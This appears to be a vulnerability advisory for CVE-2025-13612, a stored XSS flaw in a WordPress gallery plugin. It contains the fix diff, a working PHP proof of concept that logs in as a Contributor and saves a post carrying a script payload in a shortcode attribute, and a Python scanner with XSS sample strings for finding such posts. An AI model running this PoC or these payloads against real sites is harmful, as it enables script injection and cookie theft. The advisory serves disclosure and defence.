 											);
 										}
 									}
@@ -158,14 +158,14 @@
 												esc_attr( $plugin_data['slug'] ),
 												esc_url( $status['url'] ),
 												/* translators: %s: Plugin name and version. */
-												esc_attr( sprintf( __( 'Update %s now' ), $name ) ),
+												esc_attr( sprintf( __( 'Update %s now', 'album-and-image-gallery-plus-lightbox' ), $name ) ),
 												esc_attr( $name ),
-												__( 'Update Now' )
+												__( 'Update Now', 'album-and-image-gallery-plus-lightbox' )
 											);
 										} else {
 											$action_links[] = sprintf(
 												'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-												_x( 'Cannot Update', 'plugin' )
+												_x( 'Cannot Update', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 											);
 										}
 									}
@@ -176,12 +176,12 @@
 									if ( is_plugin_active( $status['file'] ) ) {
 										$action_links[] = sprintf(
 											'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-											_x( 'Active', 'plugin' )
+											_x( 'Active', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 										);
 									} elseif ( current_user_can( 'activate_plugin', $status['file'] ) ) {
-										$button_text = __( 'Activate' );
+										$button_text = __( 'Activate', 'album-and-image-gallery-plus-lightbox' );
 										/* translators: %s: Plugin name. */
-										$button_label = _x( 'Activate %s', 'plugin' );
+										$button_label = _x( 'Activate %s', 'plugin', 'album-and-image-gallery-plus-lightbox' );
 										$activate_url = add_query_arg(
 											array(
 												'_wpnonce' => wp_create_nonce( 'activate-plugin_' . $status['file'] ),
@@ -192,9 +192,9 @@
 										);

 										if ( is_network_admin() ) {
-											$button_text = __( 'Network Activate' );
+											$button_text = __( 'Network Activate', 'album-and-image-gallery-plus-lightbox' );
 											/* translators: %s: Plugin name. */
-											$button_label = _x( 'Network Activate %s', 'plugin' );
+											$button_label = _x( 'Network Activate %s', 'plugin', 'album-and-image-gallery-plus-lightbox' );
 											$activate_url = add_query_arg( array( 'networkwide' => 1 ), $activate_url );
 										}

@@ -207,7 +207,7 @@
 									} else {
 										$action_links[] = sprintf(
 											'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-											_x( 'Installed', 'plugin' )
+											_x( 'Installed', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 										);
 									}
 									break;
@@ -218,9 +218,9 @@
 							'<a href="%s" class="thickbox open-plugin-details-modal" aria-label="%s" data-title="%s">%s</a>',
 							esc_url( $details_link ),
 							/* translators: %s: Plugin name and version. */
-							esc_attr( sprintf( __( 'More information about %s' ), $name ) ),
+							esc_attr( sprintf( __( 'More information about %s', 'album-and-image-gallery-plus-lightbox' ), $name ) ),
 							esc_attr( $name ),
-							__( 'More Details' )
+							__( 'More Details', 'album-and-image-gallery-plus-lightbox' )
 						);
 					?>

@@ -265,10 +265,10 @@
 								</div>

 								<div class="column-updated">
-									<strong><?php esc_html_e( 'Last Updated:' ); ?></strong>
+									<strong><?php esc_html_e( 'Last Updated:', 'album-and-image-gallery-plus-lightbox' ); ?></strong>
 									<?php
 										/* translators: %s: Human-readable time difference. */
-										printf( __( '%s ago' ), human_time_diff( $last_updated_timestamp ) );
+										printf( __( '%s ago', 'album-and-image-gallery-plus-lightbox' ), human_time_diff( $last_updated_timestamp ) );
 									?>
 								</div>

@@ -278,27 +278,27 @@
 										$active_installs_millions = floor( $plugin_data['active_installs'] / 1000000 );
 										$active_installs_text     = sprintf(
 											/* translators: %s: Number of millions. */
-											_nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations' ),
+											_nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations', 'album-and-image-gallery-plus-lightbox' ),
 											number_format_i18n( $active_installs_millions )
 										);
 									} elseif ( 0 == $plugin_data['active_installs'] ) {
-										$active_installs_text = _x( 'Less Than 10', 'Active plugin installations' );
+										$active_installs_text = _x( 'Less Than 10', 'Active plugin installations', 'album-and-image-gallery-plus-lightbox' );
 									} else {
 										$active_installs_text = number_format_i18n( $plugin_data['active_installs'] ) . '+';
 									}
 									/* translators: %s: Number of installations. */
-									printf( __( '%s Active Installations' ), $active_installs_text );
+									printf( __( '%s Active Installations', 'album-and-image-gallery-plus-lightbox' ), $active_installs_text );
 									?>
 								</div>

 								<div class="column-compatibility">
 									<?php
 									if ( ! $tested_wp ) {
-										echo '<span class="compatibility-untested">' . __( 'Untested with your version of WordPress' ) . '</span>';
+										echo '<span class="compatibility-untested">' . __( 'Untested with your version of WordPress', 'album-and-image-gallery-plus-lightbox' ) . '</span>';
 									} elseif ( ! $compatible_wp ) {
-										echo '<span class="compatibility-incompatible">' . __( '<strong>Incompatible</strong> with your version of WordPress' ) . '</span>';
+										echo '<span class="compatibility-incompatible">' . __( '<strong>Incompatible</strong> with your version of WordPress', 'album-and-image-gallery-plus-lightbox' ) . '</span>';
 									} else {
-										echo '<span class="compatibility-compatible">' . __( '<strong>Compatible</strong> with your version of WordPress' ) . '</span>';
+										echo '<span class="compatibility-compatible">' . __( '<strong>Compatible</strong> with your version of WordPress', 'album-and-image-gallery-plus-lightbox' ) . '</span>';
 									}
 									?>
 								</div>
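Review bot: the three compatibility strings are `echo`ed straight from `__()`, and two of them carry `<strong>` markup; a translated string is untrusted at output, so wrap these in `wp_kses( ..., array( 'strong' => array() ) )` rather than echoing the raw translation.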
@@ -309,14 +309,14 @@
 					<?php } ?>

 				</div>
-				<div class="espbw-hide espbw-search-no-result"><?php esc_html_e('Sorry, No result found. Please refine your search.', 'espbw'); ?></div>
+				<div class="espbw-hide espbw-search-no-result"><?php esc_html_e('Sorry, No result found. Please refine your search.', 'album-and-image-gallery-plus-lightbox'); ?></div>
 			</div><!-- end .espbw-plugin-list-wrap -->
 		</form>
 		<?php } else { ?>

 				<div class="espbw-no-result">
-					<p><?php esc_html_e('Sorry, Something happened wrong.', 'espbw'); ?></p>
-					<p><?php esc_html_e('You can take a look at our all plugins at', 'espbw'); ?> <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank"><?php esc_html_e('here', 'espbw'); ?></a>.</p>
+					<p><?php esc_html_e('Sorry, Something happened wrong.', 'album-and-image-gallery-plus-lightbox'); ?></p>
+					<p><?php esc_html_e('You can take a look at our all plugins at', 'album-and-image-gallery-plus-lightbox'); ?> <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank"><?php esc_html_e('here', 'album-and-image-gallery-plus-lightbox'); ?></a>.</p>
 				</div>

 			<?php }
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/class-espbw-script.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/class-espbw-script.php
@@ -36,7 +36,7 @@
 		wp_register_script( 'espbw-admin-script', WPOS_ESPBW_URL.'assets/js/admin-script.js', array('jquery'), WPOS_ESPBW_VERSION, true );

 		// Olny for dashboard screen
-		if( strpos( $page, 'espbw-dashboard' ) !== false ) {
+		if ( strpos( $page, 'espbw-dashboard' ) !== false ) {

 			// enqueing admin css
 			wp_enqueue_style( 'espbw-admin-css' );
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/wpos-recommendation.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/wpos-recommendation.php
@@ -57,7 +57,7 @@
 	 */
 	public function __clone() {
 		// Cloning instances of the class is forbidden.
-		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?' ), '1.0' );
+		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'album-and-image-gallery-plus-lightbox' ), '1.0' );
 	}

 	/**
@@ -69,7 +69,7 @@
 	 */
 	public function __wakeup() {
 		// Unserializing instances of the class is forbidden.
-		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?' ), '1.0' );
+		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'album-and-image-gallery-plus-lightbox' ), '1.0' );
 	}

 	/**

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13612 - Album and Image Gallery Plus Lightbox <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin's Shortcode
//
// Assumptions and caveats:
// - The target serves the classic editor form on post-new.php / post.php:
//   the regexes below read the _wpnonce and post_ID hidden fields from that
//   form and the save goes through post.php?action=editpost. The block
//   editor saves through the REST API instead, so this flow does not apply there.
// - A Contributor lacks the unfiltered_html capability, so WordPress runs
//   wp_kses over post_content at save time. The html_entity_decode() call that
//   2.1.8 removed is what let a decoded attribute value reach the page as live
//   markup; check what survives kses on your test instance before relying on
//   the raw payload below.
// - A Contributor cannot publish, so the post is stored as "pending": the
//   shortcode renders when an Editor or Administrator previews the post, or
//   once it has been published.

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to inject via content_tail parameter
$xss_payload = '...<script>alert(document.cookie)</script>';

// Initialize cURL session; one cookie jar carries the session across requests
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Login to WordPress
// GET the login form first so wordpress_test_cookie is in the jar; with it,
// wp-login.php redirects to wp-admin on success instead of re-rendering the
// form with a "cookies are blocked" error.
$login_url = $target_url . '/wp-login.php';
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
curl_exec($ch);

$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// A logged-in admin page carries the admin bar with its logout link
if (strpos($response, 'action=logout') === false) {
    echo "Login failed. Check credentials.\n";
    curl_close($ch);
    exit(1);
}

// Step 2: Get nonce and auto-draft post ID for creating new post
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Extract nonce and post ID from the page (simplified - in real scenario use DOM parsing).
// The nonce is bound to "update-post_<ID>", so post.php must receive the same post_ID.
preg_match('/"_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
preg_match('/name=[\'"]post_ID[\'"] value=[\'"]([0-9]+)[\'"]/', $response, $id_matches);
$post_id = isset($id_matches[1]) ? $id_matches[1] : '';

if ($nonce === '' || $post_id === '') {
    echo "Could not read _wpnonce/post_ID from post-new.php (block editor in use, or insufficient rights?).\n";
    curl_close($ch);
    exit(1);
}

// Step 3: Save the post with the malicious shortcode
$save_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_title' => 'Test Post with XSS',
    'content' => '[aigpl-gallery-album content_tail="' . $xss_payload . '"]',
    'post_type' => 'post',
    'post_status' => 'publish', // downgraded to "pending" for a Contributor
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $new_post_url,
    'action' => 'editpost',
    'post_ID' => $post_id,
    'originalaction' => 'editpost',
    'original_post_status' => 'auto-draft',
    'referredby' => '',
    'meta-box-order-nonce' => $nonce,
    'closedpostboxesnonce' => $nonce,
    'save' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Step 4: On success post.php redirects to post.php?post=<ID>&action=edit&message=<n>;
// on a nonce/capability failure it dies in place with no redirect.
$final_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);

if (strpos($final_url, 'action=edit') !== false && strpos($final_url, 'message=') !== false) {
    echo "Exploit successful! Post saved with ID: " . $post_id . "\n";
    echo "Visit: " . $target_url . "/?p=" . $post_id . " to trigger the XSS\n";
    echo "(A Contributor's post is held as 'pending': it renders for an Editor/Administrator preview or after publication.)\n";
} else {
    echo "Exploit failed. Check credentials, permissions and the editor form (final URL: " . $final_url . ").\n";
}

curl_close($ch);

?>
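For the response side, an added example that is not part of the Atomic Edge PoC and not plugin code: a scanner that runs over exported post content (for example a database dump or WP-CLI output, loaded here as a constructed `{post_id: post_content}` dict) and flags `[aigpl-gallery-album]` / `[aigpl-gallery-album-slider]` shortcodes whose `content_tail` would turn into markup after the `html_entity_decode()` step the vulnerable versions applied, or that carry quotes able to break out of an attribute. `html.unescape()` stands in for PHP's `html_entity_decode()`; the attribute parser covers the quoted and bare forms of `shortcode_parse_atts` but not WordPress's rejection of values containing unclosed `<`, so it over-reports rather than under-reports. The sample posts are constructed for the example.

```python
"""Hunt for CVE-2025-13612-style payloads in stored WordPress post content.

Added example (not the Atomic Edge PoC and not plugin code). Input is a
{post_id: post_content} mapping; output is a list of findings, one per
suspicious album shortcode.
"""
import html
import re

# [aigpl-gallery-album ...] or [aigpl-gallery-album-slider ...]; the tag body
# stops at the first ']' just as WordPress's shortcode regex does.
SHORTCODE_RE = re.compile(r"\[(aigpl-gallery-album(?:-slider)?)\b([^\]]*)\]")
# name="value" | name='value' | name=value  (subset of shortcode_parse_atts)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"']+))""")
TAG_RE = re.compile(r"<[A-Za-z/!][^>]*>")  # anything shaped like an HTML tag


def parse_atts(body: str) -> dict:
    """Return {attribute: value} for the attributes inside one shortcode tag."""
    atts = {}
    for m in ATTR_RE.finditer(body):
        name, dq, sq, bare = m.groups()
        atts[name.lower()] = dq if dq is not None else (sq if sq is not None else bare)
    return atts


def classify_content_tail(raw: str) -> list:
    """Reasons a content_tail value is suspicious; empty list means benign.

    html.unescape() stands in for PHP's html_entity_decode(), the call the
    vulnerable plugin applied to content_tail before output.
    """
    decoded = html.unescape(raw)
    reasons = []
    if TAG_RE.search(decoded):
        reasons.append("markup_after_decode")
        if "<" not in raw:
            reasons.append("entity_encoded")  # only live because of the decode step
    if '"' in raw or "'" in raw:
        reasons.append("quote_in_value")      # attribute break-out if echoed unescaped
    return reasons


def scan_post(post_id: int, content: str) -> list:
    """All suspicious album shortcodes in one post's content."""
    findings = []
    for m in SHORTCODE_RE.finditer(content):
        shortcode, body = m.group(1), m.group(2)
        atts = parse_atts(body)
        if "content_tail" not in atts:
            continue
        reasons = classify_content_tail(atts["content_tail"])
        if reasons:
            findings.append({
                "post_id": post_id,
                "shortcode": shortcode,
                "content_tail": atts["content_tail"],
                "reasons": reasons,
            })
    return findings


def scan_posts(posts: dict) -> list:
    """Scan {post_id: post_content}; findings come back ordered by post_id."""
    out = []
    for post_id in sorted(posts):
        out.extend(scan_post(post_id, posts[post_id]))
    return out


# Constructed sample content (not real site data).
SAMPLE_POSTS = {
    1: 'Holiday albums: [aigpl-gallery-album content_tail="..." limit="6"]',
    2: '[aigpl-gallery-album content_tail="...<script>alert(document.cookie)</script>"]',
    3: '[aigpl-gallery-album-slider content_tail="&lt;img src=x onerror=alert(1)&gt;"]',
    4: "[aigpl-gallery-album content_tail='\" onmouseover=\"alert(1)' album_grid=\"4\"]",
    5: 'Unrelated: [aigpl-gallery id="7"] and &lt;b&gt; text outside any shortcode.',
}

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"post {f['post_id']}: [{f['shortcode']}] "
              f"content_tail={f['content_tail']!r} -> {', '.join(f['reasons'])}")
```

Run against a real export, anything tagged `entity_encoded` is the pattern the removed `html_entity_decode()` call made exploitable, `markup_after_decode` alone is raw markup that kses would normally strip for a Contributor, and `quote_in_value` is worth a look even on 2.1.8 if the theme's design template echoes `content_tail` inside an attribute without `esc_attr()`.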
